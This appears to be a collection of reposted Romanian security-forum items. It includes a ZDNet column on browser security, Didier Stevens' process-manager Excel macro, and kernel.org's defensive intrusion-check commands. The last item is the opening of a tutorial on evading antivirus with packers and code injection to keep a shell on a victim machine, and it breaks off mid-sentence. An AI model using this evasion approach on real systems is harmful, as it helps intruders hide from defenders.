Rahat. Inca una dintre miile de porcarii care circula pe mail/messenger sau chiar Facebook. Nu exista bine/rau, lumina/intuneric, practic nu exista prea multe chestii. De exemplu, lumina nu exista, exista fotoni care se propaga cu viteza luminii (in vid), care la contactul cu materia (pentru noi solida) se "reflecta", ajung in ochii oamenilor prosti care "Uaaa, lumina de la Dumnezeeeeu". Iar culorile sunt doar modul diferit prin care se "reflecta" acesti fotoni la contactul cu alte suprafete, in functie de suprafata respectiva. Discutia e penibila si e inventata (nu cred ca gresesc cand spun asta) de un ratat: o persoana care e paralela si cu religia si cu stiinta. Dumnezeu nu e nici bun nici rau, e neutru daca putem spune asa (religios vorbind, iar ca exemplu: potopul - va explicati voi). Iar chestia cu cele 5 simturi, stiintific e o porcarie ilogica, folosita irational. " Foloseste electricitatea si magnetismul, dar NIMENI nu a vazut*sau nu a inteles pe deplin vreuna din acestea dou" Ia bagati mainile in priza copii fara viitor, nu poate sa va ucida ceva ce nu exista (nu are miros, nu are coaie...) In fine, inca un rahat pe pamant, creat pentru oameni inapti. Iar Einstein e acolo doar pentru marketing, daca nu era acel rand va durea in cur de acest text.

Eu am discutat cu el si e vorba de ceva serios. Va rog, fara comentarii aberante si inutile.

Internet Explorer is the safest Web browser!? Ha! By Steven J. Vaughan-Nichols | October 12, 2011, 8:46am PDT Summary: Microsoft is trying again to con people into thinking that Internet Explorer is the safest browser around. It's not. At best, it's tied with Chrome. Microsoft has always been fond of paying analysts to say that its products are best, or having partners release reports showing how their rivals' products are second-rate, and, now, Web sites that "show" how Internet Explorer (IE) is better than Chrome and Firefox when it comes to security. Really? Didn't Microsoft just release yet another major Internet Explorer patch? I quote from the IE patch update (MS11-081), which apples to all currently supported versions of Microsoft Windows and Internet Explorer and IE 6 as well: "The most severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. An attacker who successfully exploited any of these vulnerabilities could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights." Yes, that includes IE 9, the best and most up-to-date IE which is only available on Windows 7. Isn't it funny how Microsoft claims that IE 9 is the most secure of its browser family, but somehow it has to have the same problems fixed that exist in IE 6, 7, and 8? Could it be that it's really not that different after all from the rest of its historically insecure family? If you go to Microsoft's Web browser security "test" site, Your Browser Matters though, it will tell you that IE 9, with a score of four, is the most secure browser of all. Funny, it told me that it was the most secure both before and after the patch. As for the other browsers, it informs me that Firefox 7.01 only rates a 2, and Chrome 14 gets a 2.5. And, this I might add, were my scores on my Mint Linux desktop! How can they produce such clearly nonsensical results? It's because they're setting the rules on what's important and what's not. So, for example, Microsoft give IE full credit for its SmartScreen malware detection software. With SmartScreen, software that signed with a digital certificate that Microsoft trusts is allowed to be saved or ran. Chrome, on the other hand, blocks known malware, but lets you save unknown, potentially dangerous programs. On the other hand, if you do download malware with Chrome, the program is still stuck in a sandbox, where it has very limited abilities to actually attack your system. Besides that, Chrome automatically upgrades browser extensions as security fixes come out. Since programs like Adobe Flash are often used for attacks these days, and in Flash's case there have been 17 significant patches in the last 16 months, I think automatic security updates for Flash and other potential problem programs are a big deal. While Microsoft acknowledges that it doesn't provide these important features, it doesn't take away any points for lacking them from its perfect score. Interesting judgement call there Microsoft. Johnathan Nightingale, Mozilla's director of Firefox engineering, also has trouble with what factors Microsoft considers important and what it doesn't. "Mozilla is fiercely proud of our long track record of leadership on security. We believe that being safe on the Web means having a robust browser that defends against malware and phishing, includes new technologies to help sites and users secure themselves, and a responsive security team that gets security updates out quickly and reliably. Microsoft's site is more notable for the things it fails to include: security technologies like HSTS [HTTP Strict Transport Security], privacy tools like Do Not Track, and vendor response time when vulnerabilities are discovered," said Nightingale. Exactly so. Firefox has long been a leader in browser security. True, Microsoft has gotten a lot better about security, but Firefox was doing it when the horribly unsafe IE 6 was still the best Microsoft could do. True, today. you can make Windows and IE relatively safe. No, really you can. All you have to do is constantly and regularly patch it. Those of us who use other operating systems, like Linux and Mac OS X, and alternative browsers such as Chrome and Firefox, can sit back and relax more. Don't get me wrong. We must patch our software as well. As security guru Bruce Schneier points out, "Security is a process, not a product." Security also isn't something though that you measure by a Web site that, when you get down to it, simply checks to see what your browser you're running is IE 9 or not. Deciding what's a secure Web browser a lot more complicated than that. Personally, thanks to Chrome's auto-updating and sandboxing, I feel a lot safer running Chrome on Windows than I ever will running IE. Sursa: http://www.zdnet.com/blog/networking/internet-explorer-is-the-safest-web-browser-ha/1546

TaskManager Runs on 64-bit Excel Filed under: My Software - Didier Stevens @ 11:21 I’m releasing a new version of TaskManager.xls that runs on Excel 2010 64-bit too. The previous version ran on 64-bit Windows, provided you used Excel 32-bit. But this new version runs on both implementations of Excel. Download: http://didierstevens.com/files/software/TaskManager_V0_1_0.zip Dupa cum poate stiti, Excel ofera un Visual Basic Editor in care puteti crea macro-uri folosind VB. Se pare ca cineva a facut un Task Manager. Bine, ca sa functioneze, trebuie sa se execute acele macro-uri: Tools > Options > Security > Advanced si Low la Macro (nu recomand). Cod sursa: ' TaskManager.xls v0.1.0 ' Non-exhaustive list of sources: ' http://www.ex-designz.net/apidetail.asp?api_id=351 ' http://www.xtremevbtalk.com/archive/index.php/t-248755.html ' http://msdn.microsoft.com/en-us/library/ms684335%28v=vs.85%29.aspx ' ' http://didierstevens.com ' Use at your own risk ' ' Shortcommings, or todo's ;-) ' ' History: ' 2011/02/02: start ' 2011/02/04: v0.0.2 added GetTimes ' 2011/02/21: v0.0.3 added GetType ' 2011/02/22: added GetProcessFilename ' 2011/02/23: added AdjustTokenForDebug ' 2011/10/09: v0.1.0 added support for 64-bit Excel Option Explicit Private Const TH32CS_SNAPHEAPLIST = &H1 Private Const TH32CS_SNAPPROCESS = &H2 Private Const TH32CS_SNAPTHREAD = &H4 Private Const TH32CS_SNAPMODULE = &H8 Private Const TH32CS_INHERIT = &H80000000 Private Const MAX_PATH = 260 Private Const INVALID_HANDLE_VALUE = -1& Private Const PROCESS_TERMINATE = &H1 Private Const PROCESS_QUERY_INFORMATION = &H400 Private Const PROCESS_VM_READ = &H10 Private Const THREAD_SUSPEND_RESUME = &H2 Private Const TOKEN_QUERY = &H8 Private Const TokenUser = 1 Private Const TOKEN_ADJUST_PRIVILEGES = &H20 Private Const SE_PRIVILEGE_ENABLED = &H2 #If Win64 Then Private Type PROCESSENTRY32 dwSize As Long cntUsage As Long th32ProcessID As Long th32DefaultHeapID As Long th32DefaultHeapIDB As Long th32ModuleID As Long cntThreads As Long th32ParentProcessID As Long pcPriClassBase As Long pcPriClassBaseB As Long dwFlags As Long szExeFile As String * MAX_PATH End Type #Else Private Type PROCESSENTRY32 dwSize As Long cntUsage As Long th32ProcessID As Long th32DefaultHeapID As Long th32ModuleID As Long cntThreads As Long th32ParentProcessID As Long pcPriClassBase As Long dwFlags As Long szExeFile As String * MAX_PATH End Type #End If Private Type THREADENTRY32 dwSize As Long cntUsage As Long th32ThreadID As Long rh32OwnerProcessID As Long tpBasePri As Long tpDeltaPri As Long dwFlags As Long End Type Private Type FILETIME dwLowDateTime As Long dwHighDateTime As Long End Type Private Type SYSTEMTIME wYear As Integer wMonth As Integer wDayOfWeek As Integer wDay As Integer wHour As Integer wMinute As Integer wSecond As Integer wMilliseconds As Integer End Type #If Win64 Then Private Type SYSTEM_INFO wProcessorArchitecture As Integer wReserved As Integer lpMinimumApplicationAddress As LongPtr lpMaximumApplicationAddress As LongPtr dwActiveProcessorMask As Long dwNumberOfProcessors As Long dwProcessorType As Long dwAllocationGranularity As Long wProcessorLevel As Long wProcessorRevision As Long End Type #Else Private Type SYSTEM_INFO wProcessorArchitecture As Integer wReserved As Integer lpMinimumApplicationAddress As Long lpMaximumApplicationAddress As Long dwActiveProcessorMask As Long dwNumberOfProcessors As Long dwProcessorType As Long dwAllocationGranularity As Long wProcessorLevel As Long wProcessorRevision As Long End Type #End If Private Type LUID lowpart As Long highpart As Long End Type Private Type TOKEN_PRIVILEGES PrivilegeCount As Long LuidUDT As LUID Attributes As Long End Type #If Win64 Then Private Declare PtrSafe Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As LongLong, ByVal lProcessID As LongLong) As LongPtr Private Declare PtrSafe Sub CloseHandle Lib "kernel32" (ByVal hPass As LongPtr) Private Declare PtrSafe Function Process32First Lib "kernel32" (ByVal hSnapshot As LongPtr, sPE32 As PROCESSENTRY32) As Long Private Declare PtrSafe Function Process32Next Lib "kernel32" (ByVal hSnapshot As LongPtr, sPE32 As PROCESSENTRY32) As Long Private Declare PtrSafe Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Boolean, ByVal dwProcId As Long) As LongPtr Private Declare PtrSafe Function TerminateProcess Lib "kernel32" (ByVal hProcess As LongPtr, ByVal uExitCode As Long) As Long Private Declare PtrSafe Function Thread32First Lib "kernel32" (ByVal hSnapshot As LongPtr, uProcess As THREADENTRY32) As Long Private Declare PtrSafe Function Thread32Next Lib "kernel32" (ByVal hSnapshot As LongPtr, uProcess As THREADENTRY32) As Long Private Declare PtrSafe Function OpenThread Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Boolean, ByVal dwThreadId As Long) As LongPtr Private Declare PtrSafe Function SuspendThread Lib "kernel32.dll" (ByVal hThread As LongPtr) As Integer Private Declare PtrSafe Function ResumeThread Lib "kernel32.dll" (ByVal hThread As LongPtr) As Integer Private Declare PtrSafe Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As LongPtr, ByVal DesiredAccess As Long, ByRef TokenHandle As LongPtr) As Long Private Declare PtrSafe Function GetTokenInformation Lib "advapi32.dll" (ByVal TokenHandle As LongPtr, ByVal TokenInformationClass As Long, TokenInformation As Any, ByVal TokenInformationLength As Long, ByRef ReturnLength As Long) As Long Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef pTo As Any, ByRef uFrom As Any, ByVal lSize As LongLong) Private Declare PtrSafe Function LookupAccountSid Lib "advapi32.dll" Alias "LookupAccountSidA" (ByVal lpSystemName As String, ByVal Sid As Long, ByVal name As String, cbName As Long, ByVal ReferencedDomainName As String, cbReferencedDomainName As Long, peUse As Long) As Long Private Declare PtrSafe Function GetProcessTimes Lib "kernel32" (ByVal hProcess As LongPtr, lpCreationTime As FILETIME, lpExitTime As FILETIME, lpKernelTime As FILETIME, lpUserTime As FILETIME) As Long Private Declare PtrSafe Function FileTimeToLocalFileTime Lib "kernel32" (lpFileTime As FILETIME, lpLocalFileTime As FILETIME) As Long Private Declare PtrSafe Function FileTimeToSystemTime Lib "kernel32" (lpFileTime As FILETIME, lpSystemTime As SYSTEMTIME) As Long Private Declare PtrSafe Function IsWow64Process Lib "kernel32" (ByVal hProcess As LongPtr, ByRef Wow64Process As Long) As Long Private Declare PtrSafe Sub GetNativeSystemInfo Lib "kernel32" (ByRef lpSystemInfo As SYSTEM_INFO) Private Declare PtrSafe Function GetProcessImageFileName Lib "psapi" Alias "GetProcessImageFileNameA" (ByVal hProcess As LongPtr, ByVal lpFilename As String, ByVal nSize As LongLong) As Long Private Declare PtrSafe Function K32GetProcessImageFileName Lib "kernel32" Alias "K32GetProcessImageFileNameA" (ByVal hProcess As LongPtr, ByVal lpFilename As String, ByVal nSize As LongLong) As Long Private Declare PtrSafe Function QueryDosDevice Lib "kernel32" Alias "QueryDosDeviceA" (ByVal lpDeviceName As String, ByVal lpTargetPath As String, ByVal ucchMax As Long) As Long Private Declare PtrSafe Function GetCurrentProcess Lib "kernel32" () As LongPtr Private Declare PtrSafe Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LUID) As Long Private Declare PtrSafe Function AdjustTokenPrivileges Lib "advapi32" (ByVal TokenHandle As LongPtr, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As Any, ReturnLength As Any) As Long #Else Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long Private Declare Sub CloseHandle Lib "kernel32" (ByVal hPass As Long) Private Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, sPE32 As PROCESSENTRY32) As Long Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, sPE32 As PROCESSENTRY32) As Long Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Boolean, ByVal dwProcId As Long) As Long Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long Private Declare Function Thread32First Lib "kernel32" (ByVal hSnapshot As Long, uProcess As THREADENTRY32) As Long Private Declare Function Thread32Next Lib "kernel32" (ByVal hSnapshot As Long, uProcess As THREADENTRY32) As Long Private Declare Function OpenThread Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Boolean, ByVal dwThreadId As Long) As Long Private Declare Function SuspendThread Lib "kernel32.dll" (ByVal hThread As Long) As Integer Private Declare Function ResumeThread Lib "kernel32.dll" (ByVal hThread As Long) As Integer Private Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, ByRef TokenHandle As Long) As Long Private Declare Function GetTokenInformation Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal TokenInformationClass As Long, TokenInformation As Any, ByVal TokenInformationLength As Long, ByRef ReturnLength As Long) As Long Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef pTo As Any, ByRef uFrom As Any, ByVal lSize As Long) Private Declare Function LookupAccountSid Lib "advapi32.dll" Alias "LookupAccountSidA" (ByVal lpSystemName As String, ByVal Sid As Long, ByVal name As String, cbName As Long, ByVal ReferencedDomainName As String, cbReferencedDomainName As Long, peUse As Long) As Long Private Declare Function GetProcessTimes Lib "kernel32" (ByVal hProcess As Long, lpCreationTime As FILETIME, lpExitTime As FILETIME, lpKernelTime As FILETIME, lpUserTime As FILETIME) As Long Private Declare Function FileTimeToLocalFileTime Lib "kernel32" (lpFileTime As FILETIME, lpLocalFileTime As FILETIME) As Long Private Declare Function FileTimeToSystemTime Lib "kernel32" (lpFileTime As FILETIME, lpSystemTime As SYSTEMTIME) As Long Private Declare Function IsWow64Process Lib "kernel32" (ByVal hProcess As Long, ByRef Wow64Process As Long) As Long Private Declare Sub GetNativeSystemInfo Lib "kernel32" (ByRef lpSystemInfo As SYSTEM_INFO) Private Declare Function GetProcessImageFileName Lib "psapi" Alias "GetProcessImageFileNameA" (ByVal hProcess As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long Private Declare Function K32GetProcessImageFileName Lib "kernel32" Alias "K32GetProcessImageFileNameA" (ByVal hProcess As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long Private Declare Function QueryDosDevice Lib "kernel32" Alias "QueryDosDeviceA" (ByVal lpDeviceName As String, ByVal lpTargetPath As String, ByVal ucchMax As Long) As Long Private Declare Function GetCurrentProcess Lib "kernel32" () As Long Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LUID) As Long Private Declare Function AdjustTokenPrivileges Lib "advapi32" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As Any, ReturnLength As Any) As Long #End If Private dicDevices As Dictionary Private Function StartsWith(ByVal strValue As String, ByVal strStartingValue As String) As Boolean StartsWith = Left(strValue, Len(strStartingValue)) = strStartingValue End Function Private Function EndsWith(ByVal strValue As String, ByVal strEndingValue As String) As Boolean EndsWith = Right(strValue, Len(strEndingValue)) = strEndingValue End Function Private Function GetProcessOwner(ByVal lProcessID As Long) As String #If Win64 Then Dim hProcess As LongPtr Dim hToken As LongPtr #Else Dim hProcess As Long Dim hToken As Long #End If Dim lAccountName As Long Dim lDomainName As Long Dim peUse As Long Dim lNeeded As Long Dim abBuffer() As Byte Dim lpSid As Long Dim lpString As Long Dim strAccountName As String Dim strDomainName As String GetProcessOwner = "" hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, 0, lProcessID) If hProcess <> 0 Then If OpenProcessToken(hProcess, TOKEN_QUERY, hToken) <> 0 Then GetTokenInformation hToken, TokenUser, 0, 0, lNeeded ReDim abBuffer(0 To CLng(lNeeded)) If GetTokenInformation(hToken, TokenUser, abBuffer(0), UBound(abBuffer), lNeeded) = 1 Then CopyMemory lpSid, abBuffer(0), 4 strAccountName = Space(MAX_PATH) strDomainName = Space(MAX_PATH) lAccountName = MAX_PATH lDomainName = MAX_PATH If LookupAccountSid(vbNullString, lpSid, strAccountName, lAccountName, strDomainName, lDomainName, peUse) <> 0 Then If strDomainName = "" Then GetProcessOwner = Left(strAccountName, CLng(lAccountName)) Else GetProcessOwner = Left(strDomainName, CLng(lDomainName)) & "\" & Left(strAccountName, CLng(lAccountName)) End If End If End If Call CloseHandle(hToken) End If CloseHandle hProcess End If End Function Private Function GetTimes(ByVal lProcessID As Long) #If Win64 Then Dim hProcess As LongPtr #Else Dim hProcess As Long #End If Dim sFTCreation As FILETIME Dim sFTDummy As FILETIME Dim sFTCreationLocal As FILETIME Dim sSTCreation As SYSTEMTIME GetTimes = "" hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, 0, lProcessID) If hProcess <> 0 Then If GetProcessTimes(hProcess, sFTCreation, sFTDummy, sFTDummy, sFTDummy) <> 0 Then If FileTimeToLocalFileTime(sFTCreation, sFTCreationLocal) <> 0 Then If FileTimeToSystemTime(sFTCreationLocal, sSTCreation) <> 0 Then GetTimes = CStr(sSTCreation.wYear) + "/" + CStr(sSTCreation.wMonth) + "/" + CStr(sSTCreation.wDay) + " " + CStr(sSTCreation.wHour) + ":" + CStr(sSTCreation.wMinute) + ":" + CStr(sSTCreation.wSecond) End If End If End If CloseHandle hProcess End If End Function Private Function GetType(ByVal lProcessID As Long) #If Win64 Then Dim hProcess As LongPtr #Else Dim hProcess As Long #End If Dim lWoW64 As Long Dim sSI As SYSTEM_INFO GetType = "" hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, 0, lProcessID) If hProcess <> 0 Then If IsWow64Process(hProcess, lWoW64) Then GetNativeSystemInfo sSI GetType = IIf(sSI.wProcessorArchitecture > 0 And lWoW64 = 0, "64", "32") End If CloseHandle hProcess End If End Function Private Function Device2DriveFilename(ByVal strFilename As String) As String Dim varKeyDevice As Variant Device2DriveFilename = strFilename For Each varKeyDevice In dicDevices.Keys If StartsWith(strFilename, varKeyDevice) Then Device2DriveFilename = dicDevices(varKeyDevice) & Mid(strFilename, Len(varKeyDevice) + 1) End If Next End Function Private Function GetProcessFilename(ByVal lProcessID As Long) #If Win64 Then Dim hProcess As LongPtr #Else Dim hProcess As Long #End If Dim lLength As Long Dim strBuffer As String GetProcessFilename = "" hProcess = OpenProcess(PROCESS_QUERY_INFORMATION Or PROCESS_VM_READ, 0, lProcessID) If hProcess <> 0 Then strBuffer = Space(MAX_PATH) Err.Clear On Error Resume Next lLength = GetProcessImageFileName(hProcess, strBuffer, Len(strBuffer)) If Err.Number = 453 Then lLength = K32GetProcessImageFileName(hProcess, strBuffer, Len(strBuffer)) End If On Error GoTo 0 GetProcessFilename = Device2DriveFilename(Left(strBuffer, CLng(lLength))) CloseHandle hProcess End If End Function Private Function GetDevices() As Dictionary Dim intIter As Integer Dim strBuffer As String Dim lLength As Long Dim dicDevices As Dictionary Set dicDevices = New Dictionary Set GetDevices = dicDevices For intIter = Asc("A") To Asc("Z") strBuffer = Space(MAX_PATH) lLength = QueryDosDevice(Chr(intIter) & ":", strBuffer, Len(strBuffer)) If lLength > 0 Then dicDevices.Add Left(strBuffer, InStr(strBuffer, vbNullChar) - 1), Chr(intIter) & ":" End If Next End Function Private Sub ProcessListToSheet(oCell) #If Win64 Then Dim hSnapshot As LongPtr #Else Dim hSnapshot As Long #End If Dim lRet As Long Dim sPE32 As PROCESSENTRY32 Dim strProcess As String Dim iIter As Integer Dim iColumn As Integer Dim iPositionNull As Integer AdjustTokenForDebug hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&) If hSnapshot <> INVALID_HANDLE_VALUE Then sPE32.dwSize = Len(sPE32) lRet = Process32First(hSnapshot, sPE32) iIter = oCell.Row iColumn = oCell.Column Do While lRet iPositionNull = InStr(1, sPE32.szExeFile, Chr(0)) If iPositionNull > 0 Then strProcess = Left(sPE32.szExeFile, iPositionNull - 1) Else strProcess = "" End If Cells(iIter, iColumn).Value = strProcess Cells(iIter, iColumn + 1).Value = sPE32.th32ProcessID Cells(iIter, iColumn + 2).Value = GetProcessFilename(sPE32.th32ProcessID) Cells(iIter, iColumn + 3).Value = GetProcessOwner(sPE32.th32ProcessID) Cells(iIter, iColumn + 4).Value = GetTimes(sPE32.th32ProcessID) Cells(iIter, iColumn + 5).Value = GetType(sPE32.th32ProcessID) iIter = iIter + 1 lRet = Process32Next(hSnapshot, sPE32) Loop CloseHandle hSnapshot End If End Sub Private Sub SuspendProcessByID(ByVal lProcessID As Long, ByVal bSuspend As Boolean) #If Win64 Then Dim hSnapshot As LongPtr Dim hThread As LongPtr #Else Dim hSnapshot As Long Dim hThread As Long #End If Dim lRet As Long Dim sTE32 As THREADENTRY32 hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0&) If hSnapshot <> INVALID_HANDLE_VALUE Then sTE32.dwSize = Len(sTE32) lRet = Thread32First(hSnapshot, sTE32) Do While lRet If sTE32.rh32OwnerProcessID = lProcessID Then hThread = OpenThread(THREAD_SUSPEND_RESUME, False, sTE32.th32ThreadID) If hThread <> 0 Then If bSuspend Then SuspendThread hThread Else ResumeThread hThread End If CloseHandle hThread End If End If lRet = Thread32Next(hSnapshot, sTE32) Loop CloseHandle hSnapshot End If End Sub Private Sub TerminateProcessByID(ByVal lProcessID As Long) #If Win64 Then Dim hProcess As LongPtr #Else Dim hProcess As Long #End If hProcess = OpenProcess(PROCESS_TERMINATE, 0, lProcessID) If hProcess <> 0 Then TerminateProcess hProcess, 0 CloseHandle hProcess End If End Sub Private Sub ExecuteCommands(oCell) Dim iIter As Integer Dim iColumn As Integer AdjustTokenForDebug iIter = oCell.Row iColumn = oCell.Column Do While Cells(iIter, iColumn + 1).Value <> "" Select Case LCase(Cells(iIter, iColumn).Value) Case "t": TerminateProcessByID Cells(iIter, iColumn + 2).Value Case "s": SuspendProcessByID Cells(iIter, iColumn + 2).Value, True Case "r": SuspendProcessByID Cells(iIter, iColumn + 2).Value, False End Select iIter = iIter + 1 Loop End Sub Private Sub AdjustTokenForDebug() #If Win64 Then Dim hToken As LongPtr #Else Dim hToken As Long #End If Dim sTP As TOKEN_PRIVILEGES If OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken) <> 0 Then If LookupPrivilegeValue("", "SeDebugPrivilege", sTP.LuidUDT) <> 0 Then sTP.PrivilegeCount = 1 sTP.Attributes = SE_PRIVILEGE_ENABLED If AdjustTokenPrivileges(hToken, False, sTP, 0, ByVal 0&, ByVal 0&) <> 0 Then End If End If CloseHandle hToken End If End Sub Sub MacroProcessList() Range("A7:G65000").ClearContents Set dicDevices = GetDevices() ProcessListToSheet Range("B7") Range("A6:G65000").Sort "Process executable", xlAscending, header:=xlYes End Sub Sub MacroExecuteCommands() ExecuteCommands Range("A7") End Sub Sursa: http://blog.didierstevens.com/2011/10/15/taskmanager-runs-on-64-bit-excel/

kernel.org status: hints on how to check your machine for intrusion From: Greg KH <greg-AT-kroah.com> To: Linux Kernel Mailing List <linux-kernel-AT-vger.kernel.org> Subject: kernel.org status: hints on how to check your machine for intrusion The compromise of kernel.org and related machines has made it clear that some developers, at least, have had their systems penetrated. As we seek to secure our infrastructure, it is imperative that nobody falls victim to the belief that it cannot happen to them. We all need to check our systems for intrusions. Here are some helpful hints as proposed by a number of developers on how to check to see if your Linux machine might be infected with something: 0. One way to be sure that your system is not compromised is to simply do a clean install; we can all benefit from a new start sometimes. Before reinstalling any systems, though, consider following the steps below to learn if your system has been hit or not. 1. Install the chkrootkit package from your distro repository and see if it reports anything. If your distro doesn't have the chkroot package, download it from: http://www.chkrootkit.org/ Another tool is the ossec-rootcheck tool which can be found at: http://www.ossec.net/main/rootcheck And another one is the rkhunter program: http://www.rootkit.nl/projects/rootkit_hunter.html [Note, this tool has the tendancy to give false-positives on some Debian boxes, please read /usr/share/doc/rkhunter/README.Debian.gz if you run this on a Debian machine] 2. Verify that your package signatures match what your package manager thinks they are. To do this on a rpm-based system, run the following command: rpm --verify --all Please read the rpm man page for information on how to interpret the output of this command. To do this on a Debian based system, run the following bash snippet: dpkg -l \*|while read s n rest; do if [ "$s" == "ii" ]; then echo $n; fi; done > ~/tmp.txt for f in `cat ~/tmp.txt`; do debsums -s -a $f; done If you have a source-based system (Gentoo, LFS, etc.) you presumably know what you are doing already. 3. Verify that your packages are really signed with the distro's keys. Here's a bash snippet that can do this on a rpm based system to verify that the packages are signed with any key, not necessarily your distro's key. That exercise is left for the reader: for package in `rpm -qa`; do sig=`rpm -q --qf '%{SIGPGP:pgpsig}\n' $package` if [ -z "$sig" ] ; then # check if there is a GPG key, not a PGP one sig=`rpm -q --qf '%{SIGGPG:pgpsig}\n' $package` if [ -z "$sig" ] ; then echo "$package does not have a signature!!!" fi fi done Unfortunately there is no known way of verifying this on Debian-based systems. 4. To replace a package that you find suspect, uninstall it and install it anew from your distro. For example, if you want to reinstall the ssh daemon, you would do: $ /etc/init.d/sshd stop rpm -e openssh zypper install openssh # for openSUSE based systems yum install openssh # for Fedora based systems Ideally do this from a live cdrom boot, using the 'rpm --root' option to point rpm at the correct location. 5. From a liveCD environment, look for traces such as: a. Rogue startup scripts in /etc/rc*.d and equivalent directories. b. Strange directories in /usr/share that do not belong to a package. This can be checked on an rpm system with the following bash snippet: for file in `find /usr/share/`; do package=`rpm -qf -- ${file} | grep "is not owned"` if [ -n "$package" ] ; then echo "weird file ${file}, please check this out" fi done 6. Look for mysterious log messages, such as: a. Unexpected logins in wtmp and /var/log/secure*, quite possibly from legitimate users from unexpected hosts. b. Any program trying to touch /dev/mem. c. References to strange (non-text) ssh version strings in /var/log/secure*. These do not necessarily indicate *successful* breakins, but they indicate *attempted* breakins which means your system or IP address has been targeted. 7. If any of the above steps show possible signs of compromise, you should investigate further and identify the actual cause. If it becomes clear that the system has indeed been compromised, you should certainly reinstall the system from the beginning, and change your credentials on all machines that this machine would have had access to, or which you connected to through this machine. You will need to check your other systems carefully, and you should almost certainly notify the administrators of other systems to which you have access. Finally, please note that these hints are not guaranteed to turn up signs of a compromised systems. There are a lot of attackers out there; some of them are rather more sophisticated than others. You should always be on the alert for any sort of unexpected behavior from the systems you work with. thanks, greg k-h Sursa: kernel.org status: hints on how to check your machine for intrusion [LWN.net]

Bypassing Anti-virus using Code Injection Technique Author: Amit Malik aka DouBle_Zer0 Contents Introduction Antivirus Executables PEview Encrypter/packer/protector The Concept of Injector Video Demonstration Download Injector References Introduction This article throws light on how 'Code Injection' or 'DLL Injection' technique can be used as prominent weapon along with other techniques to bypass Anti-virus softwares. It also explains top level technical details revolving around EXE internals, protectors/packers, encoded shellcodes, inner working of Antivirus etc Accompanying this article, you will find video demonstration of 'Injector (POC Tool)' which shows code injection technique to successfully bypass Antivirus software on the system. Antivirus Antivirus (or anti-virus) Software is used to prevent, detect, and remove, malware, including computer viruses, worms, and Trojan horse. Such programs may also prevent and remove adware, spyware, and other forms of malware. @ Wikipedia Antivirus play a major role for the security of a system. But for hackers/ pentesters , it creates some big problems. During the post exploitation phase we have some sort of excess on the victim machine and generally we want to upload some tools on the victim machine for better control but here antivirus play with our tools and detect them as a malicious file and delete them. Now it may be possible if you are using your own tool then antivirus may fail to detect it but this is rare situation during a pentesting. In case, if we use publicly exposed tools then there is higher probability of getting caught by antivirus. A simple example: Suppose we have a reverse shell now we know that this is a single connection to our machine from our victim and we don't want to loose it at any condition. So we upload some tools on the victim machine like netcat or other executable (may be generated from metasploit) to get a backup connection etc.. may be to upgrade our shell to merepreter shell. But our victim is using a anti virus and anti virus delete the uploaded files. Now we need something else means either bypass AV or write our own code. But the question here is how antivirus is able to detect our executables (.exe). Executables (.EXE) Basically exe files not only contain your code but also contain some important data that is only meaningful for a Operating system loader. AAnd technical name for that data is PE (portable executable) file header/ PE file format. I am not explaining pe file format here. Here is the snapshot, PEview - PE File Viewer Tool So when we execute exe, windows loader first read the PE header and on the basis of header information loader loads the file into memory.br> Executable Detection (top level view): So when we copy the file on system then antivirus scan the file (check for known signatures) and if the file is malicious then delete the file. Encrypter/packer/protector The above technologies (Encrypter/packer/protector) are not only to evade anti viruses. People also use them for ethical work. Basically encryptor/packers encrypt/pack the file and add the decryption/unpacking routine into the file. So when we execute the file windows loader loads the file on the basis of PE header (encryptor/packer does not pack the PE header of a file they only change the necessary values in PE header. Eg. Address of entry point, sections etc..). so the unpacking work something like this: SSo unpacking/decryption routine unpack the code and then jump on the Original Entry Point (on our real code freshly recovered from unpacking routines). So if we pack the exe with any packer then Antivirus should not be able to detect the exe?. Ok now its time to do some practical. Pack any malicious file with UPX (a freeware packer) and then test again with Antivirus. You should see that your AV is again popping up the alert and telling that hey don't try to fool me it is malicious.. But our file was packed how AV still know that it is a malicious file and the answer is AV has also signature for UPX, so what AV is doing it loads the file detect the packer then decrypt/unpack(AV also know how to unpack UPX packed files ?) the file and then test the file, And this is the reason that AV still know that file is malicious. But hey where is proof that AV is doing all this shit to test file. Ok to prove just open the same packed file in a hex editor and just overwrite the starting bytes with some garbage values and then again test it with your AV. Now you should see 